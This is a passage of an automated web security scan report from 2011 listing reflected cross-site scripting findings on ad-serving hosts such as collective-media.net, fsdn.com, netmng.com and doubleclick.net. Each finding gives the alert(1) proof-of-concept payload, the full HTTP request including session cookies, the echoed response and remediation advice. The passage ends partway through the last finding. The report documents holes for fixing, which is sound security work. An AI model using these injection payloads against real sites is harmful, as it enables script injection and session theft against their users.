Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:16 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?&1d913'-alert(1)-'3feb78746bb=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56604'-alert(1)-'a336edbc83a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?56604'-alert(1)-'a336edbc83a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sat, 23 Jul 2011 13:48:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:15 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?56604'-alert(1)-'a336edbc83a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af'-alert(1)-'eaa09b6c518 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston716af'-alert(1)-'eaa09b6c518/be_life;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston716af'-alert(1)-'eaa09b6c518/be_life;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8ae'-alert(1)-'98331bd179c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e409'-alert(1)-'2bccaf234b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?&5e409'-alert(1)-'2bccaf234b5=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?&5e409'-alert(1)-'2bccaf234b5=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25988'-alert(1)-'2536406d3ba was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?25988'-alert(1)-'2536406d3ba HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sat, 23 Jul 2011 13:48:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:31 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?25988'-alert(1)-'2536406d3ba;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def1c'-alert(1)-'c357eca95f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbookdef1c'-alert(1)-'c357eca95f6/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8539
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10222814201_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbookdef1c'-alert(1)-'c357eca95f6&size=300x250&imp_id=cm-10222814201_1311271253,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbookdef1c%27-alert%281%29-%27c357eca95f
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fa4e(a)a8c98bec559 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=5fa4e(a)a8c98bec559 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:52 GMT
Content-Length: 8446
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:52 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
s/collective",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:5fa4e(a)a8c98bec559,
uqid:bap_rnd,
cps:'cm,bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.fsdn.com
Path:   /adops/google/rev2/afc/css/

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 571d6<script>alert(1)</script>cb7344dcae0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adops/google/rev2/afc/css/?fn=afc_sf_imu_grey_x1.css&id=fad72571d6<script>alert(1)</script>cb7344dcae0&class=ad HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/css; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Sat, 06 Aug 2011 04:42:34 GMT
Date: Sat, 23 Jul 2011 04:42:34 GMT
Content-Length: 1274
Connection: close

#fad72571d6<script>alert(1)</script>cb7344dcae0 {
   width:300px;
   height:250px;
}

#fad72571d6<script>alert(1)</script>cb7344dcae0 div.google_afc {
   width:300px;
   height:250px;
   text-align:center;

...[SNIP]...

3.20. http://a.netmng.com/hic/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b532"><script>alert(1)</script>1c809b7e17d was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRflztgED0I2C1qSGxfKQ30JhG6I9%2B82AcGCSG4fp0PY4TBZ4S3MlrjOmmteXUAUoOdN7dG7kiWhSQrDQPTbLOV; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d;?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.21. http://a.netmng.com/hic/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb57"><script>alert(1)</script>d7a9c0aaf4c was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRvPrOi2h1nnLXEbLzAx%2FMbymvWgkgSDWaJ1NnSqwvsCipe9M%2B%2F6dyjEczknUspeVthiWdr3v5YG6tiKaLtu61l; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http:/
...[SNIP]...
k?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c;?">
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43e13"style="x:expression(alert(1))"6815619fe6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

